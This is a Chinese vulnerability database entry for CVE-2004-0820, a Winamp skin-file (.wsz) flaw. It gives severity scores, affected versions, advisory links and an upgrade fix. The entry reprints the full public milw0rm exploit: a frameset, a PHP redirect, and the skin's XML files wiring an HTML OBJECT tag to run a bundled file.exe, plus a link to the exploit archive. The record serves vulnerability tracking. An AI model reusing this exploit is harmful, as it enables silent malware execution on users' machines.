CVE-2004-0820
CVSS4.6
发布时间 :2004-08-28 00:00:00
修订时间 :2008-09-05 16:39:30
NMCOE    

[原文]Winamp before 5.0.4 allows remote attackers to execute arbitrary script in the Local computer zone via script in HTML files that are referenced from XML files contained in a .wsz skin file.


[CNNVD]Winamp漏洞(CNNVD-200408-224)

        Winamp 5.0.4之前的版本存在漏洞。远程攻击者借助HTML文件的脚本执行本地计算机区的任意脚本,该文件引用.wsz皮肤文件包含的XML文件。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:nullsoft:winamp:2.61::full
cpe:/a:nullsoft:winamp:2.62::standard
cpe:/a:nullsoft:winamp:2.80
cpe:/a:nullsoft:winamp:5.03Nullsoft Winamp 5.03
cpe:/a:nullsoft:winamp:2.24
cpe:/a:nullsoft:winamp:2.73
cpe:/a:nullsoft:winamp:2.74
cpe:/a:nullsoft:winamp:2.79
cpe:/a:nullsoft:winamp:2.75
cpe:/a:nullsoft:winamp:2.77
cpe:/a:nullsoft:winamp:2.81
cpe:/a:nullsoft:winamp:2.72
cpe:/a:nullsoft:winamp:2.60::lite
cpe:/a:nullsoft:winamp:2.71
cpe:/a:nullsoft:winamp:2.76
cpe:/a:nullsoft:winamp:5.01Nullsoft Winamp 5.01
cpe:/a:nullsoft:winamp:2.91Nullsoft Winamp 2.91
cpe:/a:nullsoft:winamp:5.02Nullsoft Winamp 5.02
cpe:/a:nullsoft:winamp:5.04Nullsoft Winamp 5.04
cpe:/a:nullsoft:winamp:3.1
cpe:/a:nullsoft:winamp:2.78
cpe:/a:nullsoft:winamp:2.70::full
cpe:/a:nullsoft:winamp:3.0
cpe:/a:nullsoft:winamp:2.64::standard
cpe:/a:nullsoft:winamp:2.65
cpe:/a:nullsoft:winamp:2.50
cpe:/a:nullsoft:winamp:2.4
cpe:/a:nullsoft:winamp:2.5e
cpe:/a:nullsoft:winamp:2.10Nullsoft Winamp 2.10
cpe:/a:nullsoft:winamp:2.64
cpe:/a:nullsoft:winamp:2.60::full
cpe:/a:nullsoft:winamp:2.73::full
cpe:/a:nullsoft:winamp:2.70

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0820
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0820
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-224
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/17124
(VENDOR_ADVISORY)  XF  winamp-wsz-execute-code(17124)
http://www.frsirt.com/exploits/08252004.skinhead.php
(VENDOR_ADVISORY)  MISC  http://www.frsirt.com/exploits/08252004.skinhead.php
http://www.auscert.org.au/render.html?it=4338
(VENDOR_ADVISORY)  AUSCERT  ESB-2004.0537
http://secunia.com/advisories/12381/
(VENDOR_ADVISORY)  SECUNIA  12381

- 漏洞信息

Winamp漏洞
中危 未知
2004-08-28 00:00:00 2005-10-20 00:00:00
本地  
        Winamp 5.0.4之前的版本存在漏洞。远程攻击者借助HTML文件的脚本执行本地计算机区的任意脚本,该文件引用.wsz皮肤文件包含的XML文件。

- 公告与补丁

        

- 漏洞信息 (418)

Winamp <= 5.04 Skin File (.wsz) Remote Code Execution Exploit (EDBID:418)
windows remote
2004-08-25 Verified
0 Petrol Designs
[点击下载] [点击下载]
This 0day exploit is known to be circulating in the wild

There is no patch for this vulnerability -> Do not use Winamp !

http://www.milw0rm.com/sploits/skinhead.rar (171 Ko)


index.html
-----------
<html>
<head>
</head>
<frameset rows="*,1" framespacing="0" border="0" frameborder="NO">
<frame src="load.php" name="frame_content" scrolling="auto" noresize>
</frameset>
<noframes>
<body>
</body>
</noframes>
</html>


Load.php
---------
<?php
$httpref = $HTTP_REFERER;
header("Location: http://URL/foo.wsz");
?> 


foo.wsz (foo.zip)
-----------------
/frame/
/maki/
/shade/
/html/
/html/file.exe (malicious file to execute)
/html/test.htm (html to load the .exe)
/player/
/player/Thumbs.db
/xml/
/xml/includes.xml
/xml/player-normal.xml
/xml/player.xml
/skin.xml


/html/test.htm
----------------
<html>
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>
</html>


/xml/includes.xml
-------------------
<include file="player.xml"/>


/xml/player-normal.xml
-------------------------
<layout>
<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />
</layout>


/xml/player.xml
-----------------
<container id="main" name="main">
<include file="player-normal.xml"/>
</container>


/skin.xml
---------
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<WinampAbstractionLayer version="1.1">
<skininfo>
<version>1.0</version>
<name>Batman</name>
<comment></comment>
<author>Petrol Designs</author>
<email>info@petroldesigns.com</email>
<homepage>http://www.petroldesigns.com</homepage>
</skininfo>

<include file="xml/includes.xml"/>
<!-- 
-->
</WinampAbstractionLayer>

// milw0rm.com [2004-08-25]
		

- 漏洞信息

9195
Winamp Skin File (.WSZ) Local Zone Arbitrary Code Execution
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Uncoordinated Disclosure, Discovered in the Wild

- 漏洞描述

WinAmp contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered when a user downloads a specifically crafted WinAmp skin from a malicious website. These skins are downloaded without prompting the user when using Internet Explorer. It is possible that the flaw may allow an attacker to to place and execute arbitrary programs resulting in a loss of confidentiality, integrity, or availability.

- 时间线

2004-08-25 Unknow
2004-08-25 Unknow

- 解决方案

Upgrade to version 5.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站